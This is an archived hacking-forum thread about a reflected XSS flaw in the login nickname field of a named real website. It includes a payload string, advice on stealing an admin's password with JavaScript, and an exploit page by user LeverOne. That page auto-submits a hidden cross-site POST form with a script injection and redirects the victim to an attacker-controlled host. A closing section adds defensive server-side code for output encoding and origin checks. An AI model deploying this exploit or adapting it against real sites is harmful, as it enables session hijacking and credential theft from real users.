View full version : another question for xss
well
if you try to put some string like this "><script>alert(document.cookie)</script>
on nick+login in that site
http://www.proplay.ru/
http://funkyimg.com/u/677402JPG.jpg
result:
http://funkyimg.com/u/712561JPG.jpg
Another site:
http://funkyimg.com/u/914555JPG.jpg
http://funkyimg.com/u/633204JPG.jpg
my question:
Do you think that can be exploitable?
Just if request method is get, because method post is invisible.
I have found many sites vulnerable to xss on admin (user) login, and I think that using some cookie sniffer something can be done.
thx for your answer Mr.NOmeR1 (you are right) ;)
Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)
you can use post (it will be better)
you can get the admin's passwd (use javascript)
sorry for my english
Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)
You're right, but there isn't a necessity to write a php script, you can use just javascript and html ;)
LeverOne
16.11.2007, 21:31
http://www.proplay.ru/
- method GET not supported
- no referer-control
http://yourhost.xz/g.html - link with XSS-exploit
file g.html
<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>
redirect -->> q.html with any content
Another site -->> by analogy
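The two conditions discussed in this thread (the name field echoed back into the login form without encoding, and the login POST accepted with "no referer-control"), seen from the server side. This is an added example, not part of any post above and not the site's code; the origin `https://site.example` and all function names are assumptions.

```javascript
// Added example. SITE_ORIGIN is a placeholder; function and field names are hypothetical.
const SITE_ORIGIN = "https://site.example";

// Encode the characters that can close an attribute value or open a tag.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the submitted name goes into value="..." unchanged,
// so a leading "> ends the attribute and the tag.
function renderLoginUnsafe(name) {
  return `<input name="name" value="${name}">`;
}

// Hardened pattern: the same field, encoded for the HTML attribute context.
function renderLoginSafe(name) {
  return `<input name="name" value="${escapeHtml(name)}">`;
}

// Source check for the login POST: Origin first, Referer as fallback.
// Rejecting requests that carry neither header is a strict policy choice (assumption).
function isSameOriginPost(headers) {
  const source = headers.origin || headers.referer;
  if (!source) return false;
  try {
    return new URL(source).origin === SITE_ORIGIN;
  } catch {
    return false; // covers Origin: null and malformed values
  }
}

// Login handler sketch: refuse cross-site submissions, encode whatever is re-displayed.
function handleLoginPost(headers, body) {
  if (!isSameOriginPost(headers)) return { status: 403, html: "" };
  return { status: 200, html: renderLoginSafe(body.name || "") };
}
```

Output encoding is the actual fix for the reflection; the source check only stops a third-party page from submitting the form on the visitor's behalf, and a per-session token on the login form serves the same purpose where Origin and Referer are unreliable.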